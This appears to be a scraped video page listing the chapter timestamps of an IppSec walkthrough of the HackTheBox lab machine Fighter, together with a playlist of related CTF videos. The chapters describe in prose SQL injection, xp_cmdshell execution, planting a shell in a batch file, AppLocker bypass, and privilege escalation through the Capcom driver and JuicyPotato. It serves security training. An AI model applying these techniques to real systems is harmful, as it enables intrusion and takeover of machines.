00:12:00 - Boolean injection to force the query to return "valid login". Play with logins to find it always returns to "Service not available"
00:14:25 - Testing Union Injections for easy exfil of data
00:15:50 - Examining Stacked Queries to make running our own SQL Statements easy. Then bunch of injections to run Xp_CMDShell and get output.
00:19:30 - Some valuable recon/information in debugging our SQL queries. Noticing small things really helps.
00:34:40 - Start of making a program to give us a command shell.
01:09:40 - Explaining the program we just created. Then fix a small bug.
01:12:45 - Begin of popping the box the intended way. Finding powershell is blocked but specifying the 32-bit version is not
01:17:10 - Return of 32-bit PowerShell... Identifying we can append data to c:\users\decoder\clean.bat -- That's odd lets try to place a shell in it to see if it is being ran.
01:32:40 - Found the issue! Powershell is encoding in UTF-16 which is confusing cmd prompt. 64-bit Shell as Decoder returned!
01:35:30 - Exploiting Capcom Driver to gain root shell, this post is super helpful: http://www.fuzzysecurity.com/tutorials/28.html
01:42:18 - Escalating to System via Capcom Exploit, then copying root.exe and checkdll.dll to our box so we can reverse it.
01:47:25 - Looking at the binaries in Ida64 Free
01:51:14 - Explaining what's happening and then writing a script to bypass the password check.
01:55:35 - Start of unintended way (Juicy Potato)
01:58:10 - Finding a world write-able spot under System32 for AppLocker Bypass, thanks @Bufferov3rride -- Then uploading JuicyPotato
02:06:10 - Start of modifying JuicyPotato to accept uppercase argu
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 59 of 60
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
▶
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Tool Use & Function Calling
View skill →Related Reads
📰
📰
📰
📰
The Blind Spot of Every Cloud Config Scanner
Dev.to · Bala Paranj
Celebrating America's First 250 Years By Securing The Next 250
Forbes Innovation
Millions of Embedded Devices at Risk: Critical FatFs Vulnerabilities Demand Immediate Attention
Medium · Cybersecurity
Membedah Serangan Phishing: Cara Kerja SEToolkit & Zphisher (dan Cara Melindungi Diri dari…
Medium · Cybersecurity
Chapters (19)
0:55
Begin of Recon Nmap, Identify OS Version, Check out Page to find hostname is s
2:53
Using GoBuster and WFUZZ to identify: members.streetfighterclub.htb and member
8:45
Begin poking around the members.streetfighterclub.htb page - Find SQL Injectio
12:00
Boolean injection to force the query to return "valid login". Play with login
14:25
Testing Union Injections for easy exfil of data
15:50
Examining Stacked Queries to make running our own SQL Statements easy. Then b
19:30
Some valuable recon/information in debugging our SQL queries. Noticing small t
34:40
Start of making a program to give us a command shell.
1:09:40
Explaining the program we just created. Then fix a small bug.
1:12:45
Begin of popping the box the intended way. Finding powershell is blocked but
1:17:10
Return of 32-bit PowerShell... Identifying we can append data to c:\users\deco
1:32:40
Found the issue! Powershell is encoding in UTF-16 which is confusing cmd promp
1:35:30
Exploiting Capcom Driver to gain root shell, this post is super helpful: http:
1:42:18
Escalating to System via Capcom Exploit, then copying root.exe and checkdll.dl
1:47:25
Looking at the binaries in Ida64 Free
1:51:14
Explaining what's happening and then writing a script to bypass the password c
1:55:35
Start of unintended way (Juicy Potato)
1:58:10
Finding a world write-able spot under System32 for AppLocker Bypass, thanks @B
2:06:10
Start of modifying JuicyPotato to accept uppercase argu
🎓
Tutor Explanation
DeepCamp AI